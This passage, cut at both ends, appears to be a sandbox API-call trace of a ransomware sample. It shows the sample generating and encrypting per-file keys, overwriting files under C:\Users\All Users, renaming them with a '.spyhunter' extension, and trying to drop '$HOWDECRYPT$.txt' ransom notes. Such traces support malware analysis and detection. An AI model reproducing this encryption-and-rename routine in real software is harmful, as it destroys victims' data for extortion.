() returned 0x2c0000 [0145.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0145.415] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f1fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f1fc*=0x2800, lpOverlapped=0x0) returned 1 [0145.575] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.575] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f1fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f1fc*=0x2800, lpOverlapped=0x0) returned 1 [0145.575] GetProcessHeap () returned 0x2c0000 [0145.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0145.575] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.575] WriteFile (in: hFile=0x9c, lpBuffer=0x248f23c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f1fc, lpOverlapped=0x0 | out: lpBuffer=0x248f23c*, lpNumberOfBytesWritten=0x248f1fc*=0x4, lpOverlapped=0x0) returned 1 [0145.575] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f1fc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f1fc*=0x30, lpOverlapped=0x0) returned 1 [0145.575] CloseHandle (hObject=0x9c) returned 1 [0145.576] GetProcessHeap () returned 0x2c0000 [0145.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.576] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.spyhunter") returned 160 [0145.576] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.spyhunter" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.spyhunter")) returned 1 [0145.576] GetProcessHeap () returned 0x2c0000 [0145.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.576] GetProcessHeap () returned 0x2c0000 [0145.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.577] GetProcessHeap () returned 0x2c0000 [0145.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3001a68 | out: hHeap=0x2c0000) returned 1 [0145.577] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f240 | out: pbBuffer=0x248f240) returned 1 [0145.577] GetProcessHeap () returned 0x2c0000 [0145.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.577] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f238*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f238*=0x30) returned 1 [0145.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.579] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned 58 [0145.579] StrStrW (lpFirst="MS.EXCEL.14.1033.hxn", lpSrch=".txt") returned 0x0 [0145.579] GetProcessHeap () returned 0x2c0000 [0145.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0145.579] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f1fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f1fc*=0x146, lpOverlapped=0x0) returned 1 [0145.580] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.580] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x248f1fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f1fc*=0x146, lpOverlapped=0x0) returned 1 [0145.580] GetProcessHeap () returned 0x2c0000 [0145.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0145.580] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.580] WriteFile (in: hFile=0x9c, lpBuffer=0x248f23c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f1fc, lpOverlapped=0x0 | out: lpBuffer=0x248f23c*, lpNumberOfBytesWritten=0x248f1fc*=0x4, lpOverlapped=0x0) returned 1 [0145.580] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f1fc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f1fc*=0x30, lpOverlapped=0x0) returned 1 [0145.580] CloseHandle (hObject=0x9c) returned 1 [0145.580] GetProcessHeap () returned 0x2c0000 [0145.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.581] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.spyhunter") returned 68 [0145.581] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.spyhunter" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn.spyhunter")) returned 1 [0145.584] GetProcessHeap () returned 0x2c0000 [0145.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.584] GetProcessHeap () returned 0x2c0000 [0145.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.584] GetProcessHeap () returned 0x2c0000 [0145.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffdfa8 | out: hHeap=0x2c0000) returned 1 [0145.585] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f238 | out: pbBuffer=0x248f238) returned 1 [0145.585] GetProcessHeap () returned 0x2c0000 [0145.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.585] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f230*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f230*=0x30) returned 1 [0145.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Hx.hxn" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.585] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Hx.hxn") returned 44 [0145.585] StrStrW (lpFirst="Hx.hxn", lpSrch=".txt") returned 0x0 [0145.585] GetProcessHeap () returned 0x2c0000 [0145.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0145.585] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f1f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f1f4*=0x186, lpOverlapped=0x0) returned 1 [0145.586] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.586] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x248f1f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f1f4*=0x186, lpOverlapped=0x0) returned 1 [0145.586] GetProcessHeap () returned 0x2c0000 [0145.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0145.586] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.586] WriteFile (in: hFile=0x9c, lpBuffer=0x248f234*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f1f4, lpOverlapped=0x0 | out: lpBuffer=0x248f234*, lpNumberOfBytesWritten=0x248f1f4*=0x4, lpOverlapped=0x0) returned 1 [0145.586] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f1f4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f1f4*=0x30, lpOverlapped=0x0) returned 1 [0145.587] CloseHandle (hObject=0x9c) returned 1 [0145.587] GetProcessHeap () returned 0x2c0000 [0145.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.587] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Hx.hxn.spyhunter") returned 54 [0145.587] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Hx.hxn" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Hx.hxn.spyhunter" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn.spyhunter")) returned 1 [0145.587] GetProcessHeap () returned 0x2c0000 [0145.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.587] GetProcessHeap () returned 0x2c0000 [0145.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.587] GetProcessHeap () returned 0x2c0000 [0145.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33ea40 | out: hHeap=0x2c0000) returned 1 [0145.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.588] GetProcessHeap () returned 0x2c0000 [0145.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0090 | out: hHeap=0x2c0000) returned 1 [0145.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.588] GetProcessHeap () returned 0x2c0000 [0145.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffdee8 | out: hHeap=0x2c0000) returned 1 [0145.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.588] GetProcessHeap () returned 0x2c0000 [0145.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef7228 | out: hHeap=0x2c0000) returned 1 [0145.588] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f228 | out: pbBuffer=0x248f228) returned 1 [0145.588] GetProcessHeap () returned 0x2c0000 [0145.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.588] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f220*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f220*=0x30) returned 1 [0145.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\.." (normalized: "c:\\users\\all users\\microsoft\\wwansvc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.588] GetProcessHeap () returned 0x2c0000 [0145.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.589] GetProcessHeap () returned 0x2c0000 [0145.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffc028 | out: hHeap=0x2c0000) returned 1 [0145.589] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f228 | out: pbBuffer=0x248f228) returned 1 [0145.589] GetProcessHeap () returned 0x2c0000 [0145.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.589] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f220*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f220*=0x30) returned 1 [0145.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\." (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.589] GetProcessHeap () returned 0x2c0000 [0145.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.589] GetProcessHeap () returned 0x2c0000 [0145.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebffe0 | out: hHeap=0x2c0000) returned 1 [0145.589] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f220 | out: pbBuffer=0x248f220) returned 1 [0145.589] GetProcessHeap () returned 0x2c0000 [0145.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.589] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f218*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f218*=0x30) returned 1 [0145.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\.." (normalized: "c:\\users\\all users\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.589] GetProcessHeap () returned 0x2c0000 [0145.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.590] GetProcessHeap () returned 0x2c0000 [0145.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0aea8 | out: hHeap=0x2c0000) returned 1 [0145.590] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f220 | out: pbBuffer=0x248f220) returned 1 [0145.590] GetProcessHeap () returned 0x2c0000 [0145.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.590] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f218*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f218*=0x30) returned 1 [0145.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\." (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.590] GetProcessHeap () returned 0x2c0000 [0145.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.590] GetProcessHeap () returned 0x2c0000 [0145.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0ae08 | out: hHeap=0x2c0000) returned 1 [0145.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.591] GetProcessHeap () returned 0x2c0000 [0145.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030920 | out: hHeap=0x2c0000) returned 1 [0145.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.591] GetProcessHeap () returned 0x2c0000 [0145.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef7158 | out: hHeap=0x2c0000) returned 1 [0145.591] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f210 | out: pbBuffer=0x248f210) returned 1 [0145.591] GetProcessHeap () returned 0x2c0000 [0145.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.591] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f208*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f208*=0x30) returned 1 [0145.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.591] GetProcessHeap () returned 0x2c0000 [0145.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.591] GetProcessHeap () returned 0x2c0000 [0145.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef7088 | out: hHeap=0x2c0000) returned 1 [0145.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.591] GetProcessHeap () returned 0x2c0000 [0145.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef6fb8 | out: hHeap=0x2c0000) returned 1 [0145.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.592] GetProcessHeap () returned 0x2c0000 [0145.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f31cb0 | out: hHeap=0x2c0000) returned 1 [0145.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.592] GetProcessHeap () returned 0x2c0000 [0145.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3000418 | out: hHeap=0x2c0000) returned 1 [0145.592] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f200 | out: pbBuffer=0x248f200) returned 1 [0145.592] GetProcessHeap () returned 0x2c0000 [0145.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.593] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f1f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f1f8*=0x30) returned 1 [0145.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.594] GetProcessHeap () returned 0x2c0000 [0145.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.594] GetProcessHeap () returned 0x2c0000 [0145.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f653e8 | out: hHeap=0x2c0000) returned 1 [0145.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\sentitems\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.594] GetProcessHeap () returned 0x2c0000 [0145.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f31bc8 | out: hHeap=0x2c0000) returned 1 [0145.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\queue\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.594] GetProcessHeap () returned 0x2c0000 [0145.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7588 | out: hHeap=0x2c0000) returned 1 [0145.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\inbox\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.594] GetProcessHeap () returned 0x2c0000 [0145.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff74a8 | out: hHeap=0x2c0000) returned 1 [0145.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.594] GetProcessHeap () returned 0x2c0000 [0145.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3000320 | out: hHeap=0x2c0000) returned 1 [0145.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.595] GetProcessHeap () returned 0x2c0000 [0145.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f00138 | out: hHeap=0x2c0000) returned 1 [0145.595] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f1e8 | out: pbBuffer=0x248f1e8) returned 1 [0145.595] GetProcessHeap () returned 0x2c0000 [0145.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.595] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f1e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f1e0*=0x30) returned 1 [0145.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov"), 